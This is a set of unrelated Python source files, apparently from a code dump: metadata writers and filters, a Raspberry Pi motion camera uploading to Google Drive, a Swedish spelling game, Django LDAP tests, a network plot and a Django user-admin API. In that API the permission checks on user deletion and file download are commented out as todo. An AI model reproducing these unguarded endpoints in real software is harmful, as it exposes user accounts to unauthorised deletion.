title, subtitle = [t.strip() for t in title.split("¶")]
book_file.write('Title: {}'.format(title))
book_file.write("\n\n----\n\n")
try:
book_file.write('Subtitle: {}'.format(subtitle))
book_file.write("\n\n----\n\n")
except Exception as e:
pass
book_file.write('Publisher: {}'.format(publisher))
book_file.write("\n\n----\n\n")
book_file.write('Author: {}'.format(author))
book_file.write("\n\n----\n\n")
book_file.write('Credits: {}'.format(credits))
book_file.write("\n\n----\n\n")
book_file.write('Book_url: {}'.format(book_url))
book_file.write("\n\n----\n\n")
book_file.write('Price: {}'.format(price))
book_file.write("\n\n----\n\n")
book_file.write('Ref: {}'.format(book_ref))
book_file.write("\n\n----\n\n")
book_file.write('Width: {}'.format(width))
book_file.write("\n\n----\n\n")
book_file.write('Height: {}'.format(height))
book_file.write("\n\n----\n\n")
book_file.write('Depth: {}'.format(depth))
book_file.write("\n\n----\n\n")
book_file.write('Idx: {}'.format(idx))
book_file.write("\n\n----\n\n")
img_path = "./couvs/{}.jpg".format(book_ref)
# copy file
img_filename=os.path.join(book_path, '{}.jpg'.format(book_ref))
copyfile(img_path, img_filename)
# color
book_file.write('Color: {}'.format(clr))
book_file.write("\n\n----\n\n")
book_index += 1
book_file.close()
print('====')
csv_file.close() |
__all__ = [
'exclude_items',
'include_items',
]
import functools
import re
from itertools import filterfalse
from .utils import (
get_field,
get_item_tags,
normalize_value,
)
def _match_field(
field_value,
pattern,
*,
ignore_case=False,
normalize_values=False
):
"""Match an item metadata field value by pattern.
Note:
Metadata values are lowercased when ``normalized_values`` is ``True``,
so ``ignore_case`` is automatically set to ``True``.
Parameters:
field_value (list or str): A metadata field value to check.
pattern (str): A regex pattern to check the field value(s) against.
ignore_case (bool, Optional):
Perform case-insensitive matching.
Default: ``False``
normalize_values (bool, Optional):
Normalize metadata values to remove common differences between sources.
Default: ``False``
Returns:
bool: True if matched, False if not.
"""
if normalize_values:
ignore_case = True
normalize = normalize_value if normalize_values else lambda x: str(x)
search = functools.partial(re.search, flags=re.I) if ignore_case else re.search
# audio_metadata fields contain a list of values.
if isinstance(field_value, list):
return any(search(pattern, normalize(value)) for value in field_value)
else:
return search(pattern, normalize(field_value))
def _match_item(
item,
*,
any_all=any,
ignore_case=False,
normalize_values=False,
**kwargs
):
"""Match items by metadata.
Note:
Metadata values are lowercased when ``normalized_values`` is ``True``,
so ``ignore_case`` is automatically set to ``True``.
Parameters:
item (~collections.abc.Mapping, str, os.PathLike): Item dict or filepath.
any_all (callable, Optional):
A callable to determine if any or all filters must match to match item.
Expected values :obj:`any` (default) or :obj:`all`.
ignore_case (bool, Optional):
Perform case-insensitive matching.
Default: ``False``
normalize_values (bool, Optional):
Normalize metadata values to remove common differences between sources.
Default: ``False``
kwargs (list, Optional): Lists of values to match the given metadata field.
Returns:
bool: True if matched, False if not.
"""
tags = get_item_tags(item)
if tags is not None:
return any_all(
_match_field(
get_field(tags, field),
pattern,
ignore_case=ignore_case,
normalize_values=normalize_values,
)
for field, patterns in kwargs.items()
for pattern in patterns
)
def exclude_items(
items,
*,
any_all=any,
ignore_case=False,
normalize_values=False,
**kwargs
):
"""Exclude items by matching metadata.
Note:
Metadata values are lowercased when ``normalized_values`` is ``True``,
so ``ignore_case`` is automatically set to ``True``.
Parameters:
items (list): A list of item dicts or filepaths.
any_all (callable, Optional):
A callable to determine if any or all filters must match to exclude items.
Expected values :obj:`any` (default) or :obj:`all`.
ignore_case (bool, Optional):
Perform case-insensitive matching.
Default: ``False``
normalize_values (bool, Optional):
Normalize metadata values to remove common differences between sources.
Default: ``False``
kwargs (list, Optional): Lists of values to match the given metadata field.
Yields:
dict: The next item to be included.
Example:
>>> from google_music_utils import exclude_items
>>> list(exclude_items(song_list, any_all=all, ignore_case=True, normalize_values=True, artist=['Beck'], album=['Golden Feelings']))
"""
if kwargs:
match = functools.partial(
_match_item,
any_all=any_all,
ignore_case=ignore_case,
normalize_values=normalize_values,
**kwargs
)
return filterfalse(match, items)
else:
return iter(items)
def include_items(
items,
*,
any_all=any,
ignore_case=False,
normalize_values=False,
**kwargs
):
"""Include items by matching metadata.
Note:
Metadata values are lowercased when ``normalized_values`` is ``True``,
so ``ignore_case`` is automatically set to ``True``.
Parameters:
items (list): A list of item dicts or filepaths.
any_all (callable, Optional):
A callable to determine if any or all filters must match to include items.
Expected values :obj:`any` (default) or :obj:`all`.
ignore_case (bool, Optional):
Perform case-insensitive matching.
Default: ``False``
normalize_values (bool, Optional):
Normalize metadata values to remove common differences between sources.
Default: ``False``
kwargs (list, Optional): Lists of values to match the given metadata field.
Yields:
dict: The next item to be included.
Example:
>>> from google_music_utils import exclude_items
>>> list(include_items(song_list, any_all=all, ignore_case=True, normalize_values=True, artist=['Beck'], album=['Odelay']))
"""
if kwargs:
match = functools.partial(
_match_item,
any_all=any_all,
ignore_case=ignore_case,
normalize_values=normalize_values,
**kwargs
)
return filter(match, items)
else:
return iter(items)
|
# pke1029
# July 2018
# google drive api library
from __future__ import print_function
from apiclient.discovery import build
from httplib2 import Http
from oauth2client import file, client, tools
from apiclient.http import MediaFileUpload
# camera and other library
from picamera import PiCamera
from picamera.array import PiRGBArray
from time import sleep
from datetime import datetime
import os
import shutil
import config
def capture_image(camera, res):
camera.resolution = res
with PiRGBArray(camera) as stream:
camera.exposure_mode = 'auto'
camera.awb_mode = 'auto'
camera.capture(stream, format='rgb')
# return red value
return stream.array[:, :, 0]
def motion_detect(camera, res, frequency, threshold, sensitivity):
# initialize output
motion = False
# unpack res into height and width variables
width, height = res[0], res[1]
# take first picture
data_old = capture_image(camera, res)
# wile no motion , keep checking
while motion is False:
diff_count = 0
# wait
sleep(1 / frequency)
# take another picture
data_new = capture_image(camera, res)
# compute difference for each pixel
for w in range(width):
for h in range(height):
diff = abs(int(data_old[h][w]) - int(data_new[h][w]))
# count pixel that changed
if diff > threshold:
diff_count += 1
# if number of pixel that changed is large, motion detected
if diff_count > sensitivity:
break
if diff_count > sensitivity:
motion = True
# if not, overwrite old image with new image
else:
data_old = data_new
return motion
def record_video(camera, res, duration, file_name):
# set resolution
camera.resolution = res
# sett file name
camera.start_recording(file_name)
# wait for recording
camera.wait_recording(duration)
# end recording
camera.stop_recording()
def authenticate():
# authorization as owner
SCOPES = 'https://www.googleapis.com/auth/drive'
# store permission (credentials)
store = file.Storage('credentials.json')
# get credentials/token
creds = store.get()
# if there is no credentials, request one
if not creds or creds.invalid:
flow = client.flow_from_clientsecrets('client_secret.json', SCOPES)
creds = tools.run_flow(flow, store)
# authenticate
drive_service = build('drive', 'v3', http=creds.authorize(Http()))
return drive_service
def get_folder_id(drive_service, folder_name):
folder_id = False
query1 = "name='" + folder_name + "'"
response = drive_service.files().list(q=query1,
fields='nextPageToken, files(id, name)').execute()
items = response.get('files', [])
if items:
folder_id = items[0]['id']
return folder_id
def create_folder(drive_service, folder_name):
# folder info
file_metadata = {'name': folder_name,
'mimeType': 'application/vnd.google-apps.folder'}
# create folder
file = drive_service.files().create(body=file_metadata,
fields='id').execute()
# get folder id
folder_id = file.get('id')
return folder_id
def upload_file(drive_service, file_name, folder_id, file_path, mimetype):
# name of the file
file_metadata = {'name': file_name,
'parents': [folder_id]}
# make media
media = MediaFileUpload(file_path,
mimetype=mimetype)
# upload file
file = drive_service.files().create(body=file_metadata,
media_body=media,
fields='id').execute()
# get file id
file_id = file.get('id')
return file_id
def get_folder_list(text_file):
if not os.path.isfile(text_file):
folder_name = []
else:
with open(text_file, 'r') as f:
folder_name = f.read()
folder_name = folder_name.split('\n')
return folder_name
def main():
# parameters
rotation = config.rotation # camera orientation
lo_res = config.lo_res # resolution for motion detect
hi_res = config.hi_res # resolution for video recording
frequency = config.frequency # frequency of motion detect (Hz)
fps = config.fps # fps for video recording
duration = config.duration # duration of recording
threshold = config.threshold # difference in each pixel [0, 256]
sensitivity = config.sensitivity # difference in each frame [0, 128*96]
log_day = config.log_day # number of days to keep the log of
# authenticate google drive
print('authenticating...', end='')
drive_service = authenticate()
print(' success')
# initialize camera
camera = PiCamera()
camera.rotation = rotation
sleep(5)
# get folder list
text_file = 'folder_list.txt'
folder_list = get_folder_list(text_file)
while True:
# check if there is motion
print('dectecting motion...', end='')
motion = motion_detect(camera, lo_res, frequency, threshold, sensitivity)
if motion is True:
# get current time
now = datetime.now()
print(' motion detected ' + str(now))
folder_name = str(now.date())
file_name = str(now.time()) + '.h264'
# make a folder
if not os.path.exists(folder_name):
os.makedirs(folder_name)
file_path = folder_name + '/' + file_name
# record video
print('recording...', end='')
record_video(camera, hi_res, duration, file_path)
print(' done')
# check if folder on google drive
folder_id = get_folder_id(drive_service, folder_name)
# if not, create one
if folder_id is False:
folder_id = create_folder(drive_service, folder_name)
# record folder name
folder_list.append(folder_name)
with open(text_file, 'a') as f:
f.write(folder_name + '\n')
# upload video to drive
print('uploading...', end='')
upload_file(drive_service, file_name, folder_id, file_path, 'video/h264')
print(' success')
# check if too much log
if len(folder_list) > log_day:
print('deleting folder...', end='')
# get folder name and id
folder_name = folder_list.pop(0)
folder_id = get_folder_id(drive_service, folder_name)
# delete from drive
drive_service.files().delete(fileId=folder_id).execute()
# delete folder
shutil.rmtree(folder_name)
# remove from list and text file
with open(text_file, 'w') as f:
for folder in folder_list:
f.write(folder + '\n')
print(' success')
if __name__ == '__main__':
try:
main()
finally:
print('\nEnd of programme, developed by pke1029')
|
<reponame>SimonKagstrom/spelly<gh_stars>0
import pyttsx3
import random
import blessed
import time
def changeVoice(engine, language, gender='VoiceGenderFemale'):
for voice in engine.getProperty('voices'):
if language in voice.languages and gender == voice.gender:
engine.setProperty('voice', voice.id)
return True
raise RuntimeError("Language '{}' for gender '{}' not found".format(language, gender))
class Spelly:
ST_WELCOME = 1
ST_PRESENT_WORD = 2
ST_WAIT_KEYS = 3
ST_WORD_DONE = 4
def __init__(self, term):
self.term = term
self.nicks = ["Roy", "<NAME>", "<NAME>", "Gubba-lubben"]
self.words = ["kalkon", "måne", "ninja", "lego", "linda", "moa", "simon", "skola"]
self.shuffledWords = self.words
self.talkQueue = []
self.curWord = ""
self.curGuess = ""
self.chars = []
self.state = Spelly.ST_WELCOME
engine.connect('finished-utterance', self.onEnd)
random.shuffle(self.shuffledWords)
def getNick(self):
return random.choice(self.nicks)
def getWord(self, length):
if len(self.shuffledWords) == 0:
return None
out = self.shuffledWords.pop()
return out
def getCharacter(self):
with term.cbreak(), term.hidden_cursor():
inp = term.inkey()
return inp
def onEnd(self, name, completed):
if len(self.talkQueue) != 0:
cur = self.talkQueue.pop()
engine.say(cur)
self.event()
def event(self):
if self.state == Spelly.ST_PRESENT_WORD:
self.curWord = self.getWord(2)
if self.curWord == None:
return
self.state = Spelly.ST_WAIT_KEYS
self.chars = []
self.curGuess = "_" * len(self.curWord)
print(term.home + term.clear + term.move_y(term.height // 2))
print(term.black_on_darkslategray3(term.center(self.curGuess)))
engine.say(f"{self.getNick()}, stava till ordet {self.curWord}, {len(self.curWord)} bokstäver")
elif self.state == Spelly.ST_WAIT_KEYS:
if len(self.curWord) == len(self.chars):
self.state = Spelly.ST_WORD_DONE
what = "".join(self.chars)
engine.say(f"Du svarade {what}")
else:
c = self.getCharacter()
left = len(self.curWord) - len(self.chars) - 1
self.chars.append(c)
self.curGuess = "".join(self.chars) + "_" * left
print(term.home + term.clear + term.move_y(term.height // 2))
print(term.black_on_chartreuse3(term.center(self.curGuess)))
engine.say(c)
elif self.state == Spelly.ST_WORD_DONE:
what = "".join(self.chars)
self.state = Spelly.ST_PRESENT_WORD
text = f"Nästan rätt, försök igen!"
prettyText = term.black_on_darkorange1(term.center(text))
if what == self.curWord:
text = f"Helt rätt, ta ett nytt ord!"
prettyText = term.black_on_chartreuse3(term.center(text))
print(term.home + term.clear + term.move_y(term.height // 2))
print(prettyText)
engine.say(text)
def run(self):
self.state = Spelly.ST_PRESENT_WORD
engine.say("Välkommen!")
engine.startLoop()
if __name__ == "__main__":
term = blessed.Terminal()
print(term.home + term.clear + term.move_y(term.height // 2))
print(term.black_on_darkkhaki(term.center('Stavning!')))
engine = pyttsx3.init()
spelly = Spelly(term)
changeVoice(engine, "sv_SE", "VoiceGenderFemale")
spelly.run()
|
from django.test import TestCase
from data_facility_admin.models import *
from data_facility_admin.helpers import LDAPHelper
import mock
from mockldap import MockLdap
from django.conf import settings
import ldap
from django.utils import timezone
import datetime
class BaseLdapTestCase(TestCase):
USER_LDAP_ID = LdapObject.MIN_LDAP_UID
USER_FULL_DN = 'uid=johnlennon,ou=people,' + settings.LDAP_BASE_DN
USER_GROUP_FULL_DN = 'cn=johnlennon,ou=groups,' + settings.LDAP_BASE_DN
def setUp(self):
info = ('dc=local', { 'dc': ['local']})
adrf = (settings.LDAP_BASE_DN, { 'dc': ['dfadmin']})
admin = (settings.LDAP_SETTINGS['Connection']['BindDN'],
{ 'cn': [ 'admin'], 'userPassword': [settings.LDAP_SETTINGS['Connection']['BindPassword']]})
people = ('ou=People,' + settings.LDAP_BASE_DN, {'ou': ['People']})
groups = ('ou=Groups,' + settings.LDAP_BASE_DN, {'ou': ['Groups']})
projects = ('ou=Projects,' + settings.LDAP_BASE_DN, {'ou': ['Projects']})
datasets = ('ou=Datasets,' + settings.LDAP_BASE_DN, {'ou': ['Datasets']})
directory = dict([info, adrf, admin, people, groups, projects, datasets])
self.mockldap = MockLdap(directory)
self.mockldap.start()
self.ldapobj = self.mockldap[settings.LDAP_SERVER]
def tearDown(self):
self.mockldap.stop()
del self.ldapobj
@classmethod
def setUser(cls, ldap_id=USER_LDAP_ID, ldap_name=None, first_name="John",
last_name="Lennon",
email="<EMAIL>",
status=User.STATUS_ACTIVE,
ldap_last_auth_time=None,
ldap_lock_time=None,
ldap_last_pwd_change=None,
created_at=None,
updated_at=None,
system_user=False):
result = User.objects.filter(ldap_id=ldap_id)
if len(result) == 0:
u = User(ldap_id=ldap_id)
else:
u = result[0]
u.first_name = first_name
u.last_name = last_name
u.email = email
u.status = status
u.system_user = system_user
if ldap_last_auth_time:
u.ldap_last_auth_time = ldap_last_auth_time
if ldap_lock_time:
u.ldap_lock_time = ldap_lock_time
if ldap_last_pwd_change:
u.ldap_last_pwd_change = ldap_last_pwd_change
if ldap_name:
u.ldap_name = ldap_name
if created_at:
u.created_at = created_at
u.save()
class LdapTestCase(BaseLdapTestCase):
@mock.patch('data_facility_admin.helpers.KeycloakHelper')
def test_ldap_pending_approval_user(self, mock_keycloak):
self.setUser(status=User.STATUS_PENDING_APPROVAL)
self.assertTrue(len(User.objects.all()) == 1, "The databse should have only one user")
ldap_helper = LDAPHelper()
values = ldap_helper.flat_attributes_from_settings(settings.USER_LDAP_MAP.values())
self.ldapobj.search_s.seed(settings.LDAP_USER_SEARCH, ldap.SCOPE_SUBTREE, '(uid=*)', values)([])
LDAPHelper().export_users()
self.assertTrue(len([x for x in self.ldapobj.methods_called() if x == 'add_s']) == 0, "The add_s method should inot have been called")
self.assertFalse(self.USER_FULL_DN in self.ldapobj.directory, "The user should have been inserted")
self.assertFalse(self.USER_GROUP_FULL_DN in self.ldapobj.directory, "The user private group should have been inserted")
@mock.patch('data_facility_admin.helpers.KeycloakHelper')
def test_ldap_new_user(self, mock_keycloak):
self.setUser(status=User.STATUS_NEW)
self.assertTrue(len(User.objects.all()) == 1, "The databse should have only one user")
ldap_helper = LDAPHelper()
# values = ldap_helper.flat_attributes_from_settings(settings.USER_LDAP_MAP.values())
# self.ldapobj.search_s.seed(settings.LDAP_USER_SEARCH, ldap.SCOPE_SUBTREE, '(uid=*)', values)([])
LDAPHelper().export_users()
self.assertTrue(len([x for x in self.ldapobj.methods_called() if x == 'add_s']) == 2, "The add_s method should have been called twice")
self.assertTrue(self.USER_FULL_DN in self.ldapobj.directory, "The user should have been inserted")
self.assertTrue(self.USER_GROUP_FULL_DN in self.ldapobj.directory, "The user private group should have been inserted")
@mock.patch('data_facility_admin.helpers.KeycloakHelper')
def test_ldap_user_updates(self, mock_keycloak):
self.setUser(status=User.STATUS_NEW)
self.assertEqual(len(User.objects.all()), 1, "The databse should have only one user")
ldap_helper = LDAPHelper()
ldap_helper.export_users()
self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["first_name"]][0], "John", "Ldap Should have the original first_name")
self.setUser(first_name="Rafael")
self.assertEqual(len(User.objects.all()), 1, "The databse should have only one user")
ldap_helper.export_users()
self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["first_name"]][0], "Rafael", "LDAP should have the new first name")
self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN]["cn"][0], "<NAME>", "LDAP should have the a new full name")
self.setUser(first_name="Rafael", last_name="Alves")
self.assertEqual(len(User.objects.all()), 1, "The databse should have only one user")
ldap_helper.export_users()
self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["last_name"]][0], "Alves", "LDAP should have the new last_name")
self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN]["cn"][0], "<NAME>")
self.setUser(first_name="Rafael", last_name="Alves", email="<EMAIL>")
self.assertEqual(len(User.objects.all()), 1, "The databse should have only one user")
ldap_helper.export_users()
self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["email"]][0], "<EMAIL>", "Check if the email has been updated in LDAP")
@mock.patch('data_facility_admin.helpers.KeycloakHelper')
def test_ldap_locking_and_unlocking_user(self, mock_keycloak):
self.setUser(status=User.STATUS_NEW)
ldap_helper = LDAPHelper()
ldap_helper.export_users()
self.setUser(status=User.STATUS_LOCKED_BY_ADMIN)
ldap_helper.export_users()
self.assertIn(settings.USER_LDAP_MAP["ldap_lock_time"], self.ldapobj.directory[self.USER_FULL_DN])
self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["ldap_lock_time"]][0], "000001010000Z")
self.setUser(status=User.STATUS_UNLOCKED_BY_ADMIN)
ldap_helper.export_users()
self.assertNotIn(settings.USER_LDAP_MAP["ldap_lock_time"], self.ldapobj.directory[self.USER_FULL_DN])
@mock.patch('data_facility_admin.helpers.KeycloakHelper')
def test_ldap_disabling_user(self, mock_keycloak):
self.setUser(status=User.STATUS_NEW)
ldap_helper = LDAPHelper()
ldap_helper.export_users()
self.setUser(status=User.STATUS_DISABLED)
ldap_helper.export_users()
self.assertIn(settings.USER_LDAP_MAP["ldap_lock_time"], self.ldapobj.directory[self.USER_FULL_DN])
self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["ldap_lock_time"]][0], "000001010000Z")
@mock.patch('data_facility_admin.helpers.KeycloakHelper')
def test_ldap_inactive_users_last_auth_time(self, mock_keycloak):
self.setUser(status=User.STATUS_NEW)
ldap_helper = LDAPHelper()
ldap_helper.export_users()
self.setUser(ldap_last_auth_time=timezone.now() - datetime.timedelta(60, 0, 0))
ldap_helper.export_users()
self.assertEqual(User.STATUS_LOCKED_INACTIVITY, User.objects.filter(ldap_id=self.USER_LDAP_ID)[0].status)
self.assertIn(settings.USER_LDAP_MAP["ldap_lock_time"], self.ldapobj.directory[self.USER_FULL_DN])
self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["ldap_lock_time"]][0], "000001010000Z")
@mock.patch('data_facility_admin.helpers.KeycloakHelper')
def test_ldap_inactive_users_created_At(self, mock_keycloak):
self.setUser(status=User.STATUS_NEW)
ldap_helper = LDAPHelper()
ldap_helper.export_users()
self.setUser(created_at=timezone.now() - datetime.timedelta(60, 0, 0))
ldap_helper.export_users()
self.assertEqual(User.STATUS_LOCKED_INACTIVITY, User.objects.filter(ldap_id=self.USER_LDAP_ID)[0].status)
self.assertIn(settings.USER_LDAP_MAP["ldap_lock_time"], self.ldapobj.directory[self.USER_FULL_DN])
self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["ldap_lock_time"]][0], "000001010000Z")
|
# -*- coding: utf-8 -*-
"""
Created on Thu May 27 21:13:08 2021
@author: <NAME>
"""
import pandas as pd
import plotly.io as pio
from pyvis.network import Network
pio.renderers.default = 'browser'
class NetworkPlot:
def __init__(self, evolution_iteration):
"""
This class takes a whole evoluition class, after the evolution-process has been
finished.
It will create a network graph out of this in order to visualize the
relations between the indivudalis.
Parameters
----------
evolution_iteration : class
Instance of the Evolution.Evolution-Class.
Returns
-------
None.
"""
self.evolution_iteration = evolution_iteration
def transform(self):
"""
Create a df that will contain all instances with their parents and their
parents share.
Returns
-------
None.
"""
all_instances = self.evolution_iteration.population_alive + self.evolution_iteration.population_history
df_all_instances = pd.DataFrame([(instance.fitness_value, instance.x, instance.y, instance.uuid,\
instance.parent_1_uuid, instance.parent_1_share,\
instance.parent_2_uuid, instance.parent_2_share)
for instance in all_instances], columns=["f(x,y)", "x", "y", "Uuid","Parent 1 Uuid",\
"Parent 1 Erbanteil","Parent 2 Uuid",\
"Parent 2 Erbanteil"])
self.df_all_instances = df_all_instances
def plot(self):
"""
Create the network plot
Returns
-------
None.
"""
# initialize the network graph
net = Network(height='100%', width='100%', bgcolor='#222222',\
layout=False,font_color='white')
# define a json with plotting parameters
net.set_options("""
var options = {
"nodes": {
"shape": "circle"
},
"edges": {
"arrows": {
"from": {
"enabled": true,
"scaleFactor": 0.95
}
},
"color": {
"inherit": true
},
"scaling": {
"max": 1
},
"smooth": false
},
"physics": {
"hierarchicalRepulsion": {
"centralGravity": 0,
"nodeDistance": 275
},
"minVelocity": 0.75,
"solver": "hierarchicalRepulsion"
}
}""")
#net.show_buttons()
# add each inividual to the network
for index, row in self.df_all_instances.iterrows():
net.add_node(row["Uuid"], row["Uuid"], title=f"f(x,y) = {row['f(x,y)']}", size=1+int(10/row["f(x,y)"]))
try:
net.add_node(row["Parent 1 Uuid"], row["Parent 1 Uuid"], title=row["Parent 1 Uuid"])
net.add_edge(row["Uuid"], row["Parent 1 Uuid"], value=1/row["Parent 1 Erbanteil"])
net.add_node(row["Parent 2 Uuid"], row["Parent 2 Uuid"], title=row["Parent 2 Uuid"])
net.add_edge(row["Uuid"], row["Parent 2 Uuid"], value=1/row["Parent 2 Erbanteil"])
except:
None
neighbor_map = net.get_adj_list()
# add neighbor data to node hover data
for node in net.nodes:
node['title'] += ' Neighbors:<br>' + '<br>'.join(neighbor_map[node['id']])
node['value'] = len(neighbor_map[node['id']])
# plot the network
net.show('networkgraph.html')
|
<reponame>AngleMAXIN/nomooc<gh_stars>1-10
import os
import re
import time
from wsgiref.util import FileWrapper
import xlrd
import xlsxwriter
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.db import transaction, IntegrityError
from django.db.models import Q, Count, F
from django.http import HttpResponse, StreamingHttpResponse
from contest.models import ContestPartner, Contest
from submission.models import Submission
from utils.api import APIView, validate_serializer
from utils.shortcuts import rand_str
from ..models import AdminType, ProblemPermission, User, UserProfile, Grade, OwnInfo, UserRegisterType, \
AdminOperationRecord
from ..serializers import (
RankInfoSerializer,
UserAdminSerializer,
GenerateUserSerializer,
UserDepartmentsSerializer,
UserProfileSerializer,
ImportUserSeralizer,
UserGradeListSerializers,
UploadUsersForm, AdminOperationRecordSerializers)
class UserAdminAPI(APIView):
_u_types = {
"1": AdminType.Student,
"2": AdminType.Teacher,
"3": AdminType.Helper,
"4": AdminType.Admin,
"5": AdminType.SUPER_ADMIN
}
val_list = (
"id",
"user_id",
"email",
"phone",
"grade_id",
"is_disabled",
"create_time",
"last_login",
"userprofile__class_id",
"userprofile__avatar",
"userprofile__level",
"userprofile__real_name",
"userprofile__department",
"userprofile__major",
)
@validate_serializer(ImportUserSeralizer)
def post(self, request):
data = request.data["users"]
user_list, gra_result = [], None
# 班级学生数量
user_number = len(data)
# 如果班级学生数量至少一个且每一位学生信息大于三列,前端应做好数据项的校验
if user_number != 0 and len(data[0]) >= 3:
grade_name = data[0][2]
try:
gra_result = Grade.objects.get(class_name=grade_name)
except Grade.DoesNotExist:
# 添加日志记录错误
gra_result = Grade.objects.create(
class_name=grade_name, number=user_number)
finally:
# 如果此班级不存在,就创建此班级,老师默认为空
for user_data in data:
if len(user_data) != 3 or len(user_data[0]) > 32:
return self.error(
f"Error occurred while processing data '{user_data}'")
user_list.append(
User.objects.create(
username=user_data[0],
password=<PASSWORD>(
user_data[1]),
email=user_data[2],
grade=gra_result,
grade_name=grade_name))
try:
with transaction.atomic():
[UserProfile(user=user).save() for user in user_list]
return self.success()
except IntegrityError as e:
return self.error(str(e))
def put(self, request):
data = request.data
_user = data.pop("user")
if _user.get("email"):
user = User.objects.filter(
email=_user.get("email")).exclude(
pk=_user.get("id"))
if user.exists():
return self.error("邮箱已经存在")
admin_type = _user.get("admin_type")
if admin_type == AdminType.Admin:
problem_permission = ProblemPermission.ALL
elif admin_type == AdminType.Teacher:
problem_permission = ProblemPermission.OWN
else:
problem_permission = ProblemPermission.NONE
if admin_type == AdminType.Student:
gid, _ = Grade.objects.get_or_create(
level=data['level'],
major=data["major"],
department=data['department'],
edu_level=data['edu_level'],
class_id=data['class_id'])
User.objects.filter(
pk=_user.get("id")).update(
grade_id=gid.id
)
Grade.objects.filter(
pk=gid.id).update(
stu_number=F("stu_number") + 1)
else:
User.objects.filter(
pk=_user.get("id")).update(
grade=None
)
uid = _user.get("id")
User.objects.filter(
pk=uid).update(
phone=_user.pop("phone"),
email=_user.pop("email"),
admin_type=admin_type,
problem_permission=problem_permission,
)
data.pop("grade", None)
UserProfile.objects.filter(user_id=uid).update(**data)
return self.success()
# todo 登陆限制
def get(self, request):
uid = request.GET.get("id", None)
if uid:
try:
user = User.objects.select_related(
"userprofile").get(pk=uid)
except User.DoesNotExist:
return self.error("此用户不存在")
return self.success(UserProfileSerializer(user.userprofile).data)
user_type = request.GET.get("user_type", None)
user_type = self._u_types.get(user_type)
user = User.objects.filter(
admin_type=user_type,
register_type__in=(
'normal',
'factory',
)).select_related("userprofile").only(
*
self.val_list).values(
*
self.val_list)
keyword = request.GET.get("keyword", None)
# keyword 可以是
# 用户id,用户姓名
# 支持模糊查询
if keyword:
user = user.filter(Q(user_id__icontains=keyword) |
Q(userprofile__real_name__icontains=keyword) |
Q(email__icontains=keyword))
status = request.GET.get("status", None)
# 用户状态
if status == "true":
user = user.filter(is_disabled=False)
elif status == "false":
user = user.filter(is_disabled=True)
is_auth = request.GET.get("is_auth")
if is_auth == "1":
user = user.filter(is_auth=True)
elif is_auth == "0":
user = user.filter(is_auth=False)
info = request.GET.get("info", None)
if info:
filter_params = {}
if user_type == AdminType.Student:
le = request.GET.get("level")
if le:
filter_params['level'] = le
m = request.GET.get("major")
if m:
filter_params['major'] = m
d = request.GET.get("class_id")
if d:
filter_params['class_id'] = d
edl = request.GET.get("edu_level")
if edl:
filter_params['edu_level'] = edl
dep = request.GET.get("department")
if dep:
filter_params['department'] = dep
grade_id = Grade.objects.filter(
**filter_params).values_list("id", flat=True)
if not grade_id.exists():
data = dict(results=[], total=0)
return self.success(data)
user = user.filter(grade_id__in=grade_id)
else:
dep = request.GET.get("department")
if dep:
user = user.filter(userprofile__department__icontains=dep)
user = user.order_by('-last_login')
return self.success(
self.paginate_data(
request,
user,
UserAdminSerializer))
def delete_one(self, user_id):
with transaction.atomic():
try:
user = User.objects.get(id=user_id)
except User.DoesNotExist:
return "此用户不存在"
# if user.admin_type == AdminType.Student:
Submission.objects.filter(user_id=user_id).delete()
# else:
# return "禁用的操作"
user.delete()
# @super_admin_required
# todo 权限检查
def delete(self, request):
uids = request.GET.get("ids")
if not uids:
return self.error("格式不合格")
for _id in uids.split(","):
if _id.isdigit():
error = self.delete_one(_id)
if error:
return self.error(error)
return self.success()
class UserBatchImport(APIView):
request_parsers = ()
def process_file(self, f):
file = xlrd.open_workbook(file_contents=f.read())
table = file.sheets()[0]
column_num, rows_num = table.ncols, table.nrows
if rows_num < 3 or column_num < 1:
return None
user_list = []
for line in range(2, rows_num):
row_value = table.row_values(line)
user_list.append(row_value)
return user_list
def generate_users(self, user_list, user_type=AdminType.Student):
generate_res = dict(
failedItem=list(),
successItem=list())
for user_id_name in user_list:
real_name, user_id = user_id_name
if len(real_name) + len(user_id) < 4:
generate_res['failedItem'].append(user_id_name)
continue
try:
u = User.objects.create(
user_id=user_id,
admin_type=user_type,
password=<PASSWORD>),
register_type=UserRegisterType.FACTORY)
UserProfile.objects.create(user=u, real_name=real_name)
generate_res['successItem'].append(user_id_name)
except IntegrityError:
generate_res['failedItem'].append(user_id_name)
return generate_res
def post(self, request):
if not request.FILES:
return self.error("请确保文件上传")
file = request.FILES['file']
if file.name.split('.')[1] not in ['xlsx', 'xls']:
return self.error("文件格式不合格")
file_form = UploadUsersForm(request.POST, request.FILES)
if not file_form.is_valid():
return self.error("文件格式错误")
f = request.FILES.get("file")
user_list = self.process_file(f)
if not user_list:
return self.error("数据格式不合格")
generate_res = self.generate_users(
user_list, request.POST.get("user_type"))
# 中间延迟三秒
time.sleep(3)
return self.success(data=generate_res)
def get(self, request):
FILE_NAME = "import_users.xlsx"
import_model_file = os.path.join(settings.USER_MODEL_DIR, FILE_NAME)
if not os.path.isfile(import_model_file):
return self.error("文件不存在")
response = StreamingHttpResponse(
FileWrapper(
open(
import_model_file,
"rb")),
content_type="application/xlsx")
response["Content-Disposition"] = f"attachment; filename={FILE_NAME}"
response["Content-Length"] = os.path.getsize(import_model_file)
return response
def delete(self, request):
user_id = request.GET.get("user_id")
res = User.objects.filter(user_id=user_id).delete()
if res[0] != 2:
return self.error()
return self.success()
class GenerateUserAPI(APIView):
# @admin_role_required
def get(self, request):
"""
download users excel
"""
file_name = request.GET.get("file_name")
if not file_name:
return self.error("参数错误")
if not re.match(r"^[a-zA-Z0-9]+$", file_name):
return self.error("非法文件名")
